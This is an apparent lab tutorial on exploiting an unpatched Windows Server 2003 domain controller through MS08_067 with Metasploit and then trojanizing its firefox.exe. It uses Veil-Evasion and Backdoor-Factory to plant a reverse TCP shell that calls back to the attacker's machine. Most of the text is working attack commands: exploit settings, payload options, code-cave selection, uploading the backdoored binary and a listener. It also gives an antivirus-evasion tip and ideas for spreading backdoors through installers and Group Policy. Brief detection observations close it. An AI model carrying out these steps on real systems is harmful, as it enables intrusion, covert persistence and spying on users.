Backdooring Firefox with Veil-Evasion, Backdoor-Factory & Metasploit – Server 2003 MS08_067

In this scenario you have just compromised a Windows 2003 Domain Controller as it was unpatched for MS08_067. You don’t want to create a persistent backdoor on the target system as a vigilant administrator may see the anomaly and investigate. You are happy to wait for some time before you get a shell on the box again. The best bit is the administrator is on the box at the time so it arouses less suspicion and also allows you to spy on the administrator and see what they are doing.

What do you do?

Well you could do many things but what we will cover here is using a system application already installed on the system that we will modify with some shellcode and drop back on the target system creating a backdoor from an executable that is ran frequently on the target system and blends in with the traffic generated. Looking at the desktop shortcuts is an excellent way to see what is commonly used by the user of a system. Either that or they didn’t untick the shortcut box but in saying that there is a strong chance it will be ran in the near future if you are patient and willing to wait. Patience is the key.

I have been meaning to write about Backdoor-Factory for some time now as it’s quite cool, your executable is fully functional after it’s been modified and will continue to work like it did before without any issues if you execute the process of modifying the executable correctly that is. The other reason I wanted to write this was to show how easy it is to do something like this and why you need to scrutinize your downloads or executables, especially if they come from an unknown source like a torrent site for example. Even Altcoin executables have been targeted on forums where unsuspecting end users think they are downloading a reputable miner, when in fact it’s actually backdoored and stealing from them :-/

The combination of Veil-Evasion and Backdoor-Factory together however is an excellent combination for obfuscating your payload on a penetration test and will remain undetected by Anti-Virus as long as you don’t upload the executable file to VirusTotal, uploading the hash to check though is perfectly fine 😉

The point of this article is to not put all your trust in VirusTotal or your system Anti-Virus to confirm that something is clean.

The lab environment configured for this exploitation consists of the following systems:

1 – Pfsense <– Firewall

2 – Security Onion <– Monitoring & IDS

4 – Windows Server 2003 <– Domain Controller

5 – Kali <– Hack all the things

Trying this against production systems you are not authorized to attack will get you caught. You have been warned. Only do this to learn and generally have fun.

In this tutorial we will go through the following 7 steps below:

1 – Exploit a Windows 2003 Domain Controller with Metasploit (MS08_067).

2 – Check the shortcuts on the “All Users” desktop.

3 – Pull one of the executables from behind a shortcut on the desktop and backdoor it with Veil-Evasion using the Backdoor-Factory payload.

4 – Check the hash of the file against VirusTotal.

5 – Upload the backdoored executable to the target system.

6 – Configure a listener with Metasploit to receive the shell on the box when the shortcut is clicked.

7 – Be patient.

Kali Attacker = 192.168.1.102

Windows 2003 Domain Controller = 192.168.1.105

Let’s get to it 🙂

You’ve already done some reconnaissance with nmap and you know that the system is vulnerable to MS08_067 you then exploit the system with Metasploit’s msfconsole and gain a meterpreter shell on the Windows 2003 Domain Controller.

Msfconsole

use exploit/windows/smb/ms08_067_netapi

set rhost 192.168.1.105

exploit

1_Loading_msfconsole_exploiting_MS08_067_Windows_Server_2003

1_Loading_msfconsole_exploiting_MS08_067_Windows_Server_2003

Check the IP address and the user you’re logged on as on the box:

“ifconfig” checks your IP and MAC address

“getuid” checks the user privilege you currently have on the box which is System 🙂

2_msfconsole_MS08_067_Windows_Server_2003_exploited_check_IP_and_username

2_msfconsole_MS08_067_Windows_Server_2003_exploited_check_IP_and_username

Next, navigate the Windows 2003 directories on the system to locate the “All Users” profile and see what shortcuts are on the desktop.

cd C:\
ls
cd “Documents and Settings”
ls
cd “All Users”
ls

3_meterpreter_changing_directories_Windows_Server_2003

3_meterpreter_changing_directories_Windows_Server_2003

Continuing on

ls
cd Desktop
ls

At this point you will see the shortcuts for “All Users” and notice a shortcut for Mozilla Firefox (because you installed it). Leveraging this information there is a good chance someone will open the browser on the Server at some point and this is what we want. Alternatively system tools are an excellent choice also like the Sysinternals Suite of tools that often will exist on a Windows server. You could backdoor anything from files to installers to executables that are commonly used. Installers are another excellent way to pivot onto other boxes if there is a network share specifically holding installers for quick install on other systems as is often the case, hell you could even backdoor something that is pushed out via Group Policy and target a full Active Directory user base if the scope asks for the worst.

4_meterpreter_changing_directories_Windows_Server_2003_continued

4_meterpreter_changing_directories_Windows_Server_2003_continued

Navigate to the program files directory of Mozilla Firefox on the system as this is where the executable resides that is executed when the shortcut is clicked whether on the desktop or the Program Files directory from the Start Menu.

From the same meterpreter window run the following commands below

Cd “C:\\Program Files\\Mozilla Firefox”
ls | grep firefox.exe

Note the double backslash that needs to be passed as an escape when navigating the Windows directory using the meterpreter compared to the single backslash on a standard Windows console. The quotes are also important to encapsulate the string correctly as it has spaces similar to a Windows system.

Ls | grep firefox.exe is simply checking the contents of the Mozilla Firefox folder that you just changed into and piping it to grep to search for firefox.exe as this is the executable we are going to backdoor.

5_navigating_program_files_Mozilla_Firefox_checking_executable

5_navigating_program_files_Mozilla_Firefox_checking_executable

To download firefox.exe to your Kali system simply run the following from the meterpreter console

download firefox.exe

6_metasploit_meterpreter_download_firefox_exe

6_metasploit_meterpreter_download_firefox_exe

Now that you have the exact original version of the firefox executable on the target system you can backdoor it with Veil-Evasion, it does not come as standard with Kali but it is included in the repository so just run:

apt-get update
apt-get veil-evasion

Follow along with the prompts, they are pretty much self explanatory and you will soon have Veil-Evasion installed on your Kali system and ready to use in no time at all.

7_apt-get_update_and_apt-get_install_veil-evasion_

7_apt-get_update_and_apt-get_install_veil-evasion_

So next thing to do is run Veil-Evasion and get things moving along by running “list” to check the available payloads

8_veil_evasion_started_list

8_veil_evasion_started_list

Select option 18 for the native/backdoor_factory payload and press Enter to continue

9_veil_evasion_started_list_select_backdoor-factory_payload

9_veil_evasion_started_list_select_backdoor-factory_payload

Next you need to modify the backdoor-factory payload options from the default ones seen below

10_veil_evasion_backdoor-factory_payload_options

10_veil_evasion_backdoor-factory_payload_options

Modify the options to that of your local host IP address, local port, path of the original executable (firefox.exe), the patch method to manual and the reverse shell payload you want to use.

Set lhost 192.168.1.102
set lport 443
set original_exe /root/firefox.exe
set patch_method manual
set payload reverse_shell_tcp_inline

11_veil_evasion_backdoor-factory_payload_options_modified

11_veil_evasion_backdoor-factory_payload_options_modified

You can double check your predefined settings by running “info”

12_veil_evasion_backdoor-factory_payload_options_modified_check_info

12_veil_evasion_backdoor-factory_payload_options_modified_check_info

Once your happy with the settings next you need to run “generate” in order to generate your payload and modify the firefox.exe file to include your reverse shell hidden in shell code. You will need to locate a cave to hide your shellcode in and I find doing this manually works better than letting Backdoor-Factory automatically do this for you. The trick is to find a cave that is bigger than your initial size which is 411 in this case. Option 1 is 472, Option 2 is 551 both of which are only a little bit bigger than the size you are trying to hide your shellcode in so option 3 with a size of 1184 is the best option and should work without any issues for the task at hand. If none of the cave sizes seem of use you can use j to jump and find more caves to use instead until you are happy.

Enter 3 and hit Enter to finish the process

13_veil_evasion_backdoor-factory_payload_generate

13_veil_evasion_backdoor-factory_payload_generate

This should run without issue like this

14_veil_evasion_backdoor-factory_payload_generate_option_selected

14_veil_evasion_backdoor-factory_payload_generate_option_selected

Next you will be prompted for your payload name, enter whatever you want but the payload is firefox so it makes sense to enter firefox for the name.

15_veil_evasion_backdoor-factory_payload_generate_enter_payload_name

15_veil_evasion_backdoor-factory_payload_generate_enter_payload_name

Congratulations, you have just generated your payload. You’ll see the location of the payload file generated in the final output like the screenshot below

16_veil_evasion_backdoor-factory_payload_generated

16_veil_evasion_backdoor-factory_payload_generated

Before continuing it’s wise to check the hash on VirusTotal (not the actual executable as that will be flagged when analyzed). The hash however will not give any of the contents away and will likely remain undetected on the target system.

Change into the directory of the Virus Total Notify tool:

Cd /usr/share/veil-evasion/tools/vt-notify

Run the script with the “-s” option to check the file hash of your backdoored executable and you should see an output like the one below:

./vt-notify -s /var/lib/veil-evasion/output/compiled/firefox

17_veil_evasion_vt-notify_file_hash_check

17_veil_evasion_vt-notify_file_hash_check

Now that you know the hash is not flagged you can safely upload it back to the target system using the meterpreter shell from earlier and use the meterpreter upload command

upload /var/lib/veil-evasion/output/compiled/firefox.exe .

The dot (.) above tells upload to copy the file to the current directory which is the Mozilla Firefox program files directory we had opened earlier.

18_meterpreter_upload_firefox_backdoor

18_meterpreter_upload_firefox_backdoor

Next you need to setup a listener of your choosing but for this guide I will use Metasploits msfconsole to create the listener. At this point exit your current meterpreter session on the target system so that you are back at the msf > prompt.

Configure your listener

use exploit/multi/handler
set payload windows/shell_reverse_tcp
set lhost 192.168.1.102
set lport 443
exploit

19_msfconsole_reverse_tcp_shell_configuration

19_msfconsole_reverse_tcp_shell_configuration

Now go to your Windows 2003 Domain Controller and execute the firefox shortcut on the desktop and pop back to your meterpreter session and you should now see a connected shell on your target system in the C:\Program Files\Mozilla Firefox directory where we dropped the payload.

20_msfconsole_reverse_tcp_shell_connected

20_msfconsole_reverse_tcp_shell_connected

Checking the processes on the target system with the Sysinternals Process explorer you should see firefox.exe with a cmd.exe child process running.

21_Sysinternals_Process_Explorer_process_checking

21_Sysinternals_Process_Explorer_process_checking

Checking the TCP/IP connections currently running from the Firefox.exe process you will see your Kali remote IP address running over https port 443.

22_Sysinternals_Process_Explorer_process_checking_TCP_IP_connections

22_Sysinternals_Process_Explorer_process_checking_TCP_IP_connections

Looking at the image file I noticed it was a bit weird looking too. Not important just something weird I noticed.

23_Sysinternals_Process_Explorer_process_checking_Image_File_Weird

23_Sysinternals_Process_Explorer_process_checking_Image_File_Weird

Checking the cmd.exe child process you will see that firefox.exe is the parent of cmd.exe which should never be the case!

24_Sysinternals_Process_Explorer_process_checking_cmd_exe

24_Sysinternals_Process_Explorer_process_checking_cmd_exe

That’s it, check your Security Onion logs and see what you can determine happened. There is some interesting information in there too that warrants a closer look.

I hope you take away some valuable lessons from this tutorial and inspect the processes running on your system if you don’t do that already! Be dubious of random executables online before you download them and don’t rely on VirusTotal to save you or make you feel safe. Also, stop using Windows Server 2003 and Windows XP as these systems are full of holes and  even though MS08_067 was exploited in this article and the previous one these systems are full of holes and unsupported so move away from them. It’s really child’s play and trivial for any script kiddie to own your box.

There is also a video to accompany this article seen here below.

Until next time play in the lab and see what you can do, read the man pages and read about security threats and subscribe to RSS feeds online. It’s an excellent way to learn and get to your end goal whatever that may be.